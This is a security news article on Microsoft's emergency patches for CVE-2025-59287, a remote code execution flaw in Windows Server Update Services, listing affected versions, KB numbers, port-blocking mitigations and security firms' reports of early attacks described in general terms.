Microsoft has released out-of-band patches for a critical vulnerability in Windows Server Update Services (WSUS), for which a public proof-of-concept exploit is already available. The issue is tracked as CVE-2025-59287 and allows remote code execution on vulnerable servers.
WSUS allows administrators to manage and distribute Windows updates to computers within a corporate network. It is emphasized that the bug affects only Windows servers with the WSUS Server Role enabled (this feature is disabled by default).
The vulnerability can be exploited remotely, and such attacks require no user interaction. A remote, unauthenticated attacker can send a specially crafted event that triggers unsafe object deserialization in a legacy serialization mechanism, leading to remote code execution. As a result, an unprivileged attacker can execute malicious code with SYSTEM privileges.
This makes the bug potentially self-propagating between WSUS servers — that is, it can act like a worm.
“Windows servers without the WSUS Server Role enabled are not vulnerable. If the WSUS role is already enabled, the server is vulnerable. If you plan to enable the WSUS role, install the patch first; otherwise, the server will become vulnerable immediately after the role is activated,” Microsoft reports.
Microsoft has prepared updates for all affected versions of Windows Server and urged users to install them as soon as possible. Patches are available for:
- Windows Server 2025 (KB5070881);
- Windows Server, version 23H2 (KB5070879);
- Windows Server 2022 (KB5070884);
- Windows Server 2019 (KB5070883);
- Windows Server 2016 (KB5070882);
- Windows Server 2012 R2 (KB5070886);
- Windows Server 2012 (KB5070887).
Additionally, the developers have proposed a number of temporary measures for administrators who cannot immediately install the emergency updates. You can disable the WSUS Server Role or block all incoming traffic on ports 8530 and 8531, which will render WSUS inoperable. However, keep in mind that after disabling WSUS or blocking the traffic, Windows endpoints will stop receiving updates from the local server.
In a separate bulletin, Microsoft reported that WSUS will no longer display synchronization error details after installing these or later patches — the functionality has been temporarily disabled to address the CVE-2025-59287 vulnerability.
According to specialists at Eye Security, the first attempts to scan for and exploit the new vulnerability have already been detected. The systems of at least one of the company’s clients were compromised using an exploit different from the one that surfaced online earlier.
Although WSUS servers are usually not accessible over the internet, Eye Security discovered about 2,500 accessible instances worldwide.
The US company Huntress also warns that it has already found evidence of attacks on CVE-2025-59287, targeting WSUS instances with default ports (8530/TCP and 8531/TCP) exposed.
“We expect exploitation of CVE-2025-59287 to be limited — WSUS rarely has ports 8530 and 8531 open. Across our partner base, we identified about 25 vulnerable hosts,” Huntress noted.
In the attacks observed by Huntress, the attackers executed a PowerShell command to enumerate the internal Windows domain, after which the data was sent to a webhook. This data included the output of whoami (the current user name), net user /domain (a list of all accounts in the Windows domain), and ipconfig /all (the network configuration for all network interfaces).